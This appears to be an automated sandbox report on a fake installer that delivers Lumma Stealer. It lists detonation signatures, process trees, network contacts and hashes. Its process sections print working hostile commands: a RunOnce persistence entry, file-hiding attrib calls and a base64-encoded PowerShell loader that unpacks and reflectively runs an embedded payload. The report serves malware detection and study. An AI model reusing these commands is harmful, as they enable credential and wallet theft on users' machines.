Malware Analysis Report

2025-08-05 10:05

Sample ID 230501-n15e1ahb8s
Target pcworldx64installer.zip
SHA256 13716fdf716aa8479df57501ce208cae4fc31e5a5bb9f483764ba76fdbea4b0d
Tags
lumma evasion persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

13716fdf716aa8479df57501ce208cae4fc31e5a5bb9f483764ba76fdbea4b0d

Threat Level: Known bad

The file pcworldx64installer.zip was found to be: Known bad.

Malicious Activity Summary

lumma evasion persistence spyware stealer

Lumma Stealer

Sets file to hidden

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-01 11:52

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-01 11:52

Reported

2023-05-01 11:57

Platform

win10v2004-20230220-en

Max time kernel

136s

Max time network

155s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Setup_x64.exe.lnk

Signatures

Lumma Stealer

stealer lumma

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\particovl = "C:\\Users\\Admin\\AppData\\Roaming\\particovl.bat" C:\Windows\system32\reg.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 324 set thread context of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 784 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 784 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 4416 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 4416 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2784 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2784 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2824 wrote to memory of 3764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2824 wrote to memory of 3764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2824 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 2824 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 2824 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 2824 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Setup_x64.exe.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /T:84 /C start "Starting Installation..." /B "%CD%\README.md\entry.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\README.md\entry.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat"

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v particovl /d "C:\Users\Admin\AppData\Roaming\particovl.bat"

C:\Windows\system32\attrib.exe

attrib +s +h C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Windows\system32\attrib.exe

attrib -s -h C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 acrhitechinfo.com udp
US 192.185.235.142:443 acrhitechinfo.com tcp
US 8.8.8.8:53 142.235.185.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 20.42.65.89:443 tcp
NL 8.238.20.126:80 tcp
NL 8.238.177.126:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
PL 82.118.23.50:80 tcp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 203.151.224.20.in-addr.arpa udp
NL 8.238.177.126:80 tcp
NL 8.238.177.126:80 tcp
PL 82.118.23.50:80 tcp
US 40.125.122.176:443 tcp
PL 82.118.23.50:80 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
PL 82.118.23.50:80 tcp
PL 82.118.23.50:80 tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

memory/324-139-0x0000000004D40000-0x0000000004D76000-memory.dmp

memory/324-140-0x00000000053B0000-0x00000000059D8000-memory.dmp

memory/324-141-0x0000000005230000-0x0000000005252000-memory.dmp

memory/324-142-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/324-145-0x0000000005A50000-0x0000000005AB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oeihadb1.ogb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/324-144-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/324-143-0x00000000059E0000-0x0000000005A46000-memory.dmp

memory/324-155-0x0000000006080000-0x000000000609E000-memory.dmp

memory/324-156-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/324-157-0x00000000079E0000-0x000000000805A000-memory.dmp

memory/324-158-0x00000000065F0000-0x000000000660A000-memory.dmp

memory/324-159-0x0000000007290000-0x00000000072CC000-memory.dmp

memory/2648-160-0x0000000005330000-0x0000000005340000-memory.dmp

memory/2648-161-0x0000000005330000-0x0000000005340000-memory.dmp

memory/324-171-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/324-172-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/324-173-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/2648-175-0x0000000005330000-0x0000000005340000-memory.dmp

memory/2648-176-0x0000000005330000-0x0000000005340000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

memory/4720-181-0x0000000000400000-0x0000000000507000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 de88087c4f3ef0a38b1346b23abed67c
SHA1 be684579b18ffb443aae273a16c5df077d1d5227
SHA256 3dcb60716c8c9620f080754ccd9a6185df7a124dc66f436807f9ddd247ed2558
SHA512 93dfe69609af62e618a938ed054b10528d96f24c76b67e9c32f9ef066d3cdd82994339074320f224a9b079713ed4339ffd8422e3f0ca1573a8ad9798554d2be1

memory/4720-185-0x0000000000400000-0x0000000000507000-memory.dmp

memory/4720-186-0x0000000000400000-0x0000000000507000-memory.dmp

memory/4720-188-0x0000000000400000-0x0000000000507000-memory.dmp

memory/4720-189-0x0000000000400000-0x0000000000507000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-01 11:52

Reported

2023-05-01 11:57

Platform

win7-20230220-en

Max time kernel

30s

Max time network

34s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Setup_x64.exe.lnk

Signatures

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\particovl = "C:\\Users\\Admin\\AppData\\Roaming\\particovl.bat" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2044 wrote to memory of 1176 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 2044 wrote to memory of 1176 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 2044 wrote to memory of 1176 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 1176 wrote to memory of 832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1176 wrote to memory of 832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1176 wrote to memory of 832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 832 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 832 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 832 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 396 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 396 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 396 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 396 wrote to memory of 336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 396 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 396 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 396 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 396 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Setup_x64.exe.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /T:84 /C start "Starting Installation..." /B "%CD%\README.md\entry.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\README.md\entry.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat"

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v particovl /d "C:\Users\Admin\AppData\Roaming\particovl.bat"

C:\Windows\system32\attrib.exe

attrib +s +h C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA

C:\Windows\system32\attrib.exe

attrib -s -h C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
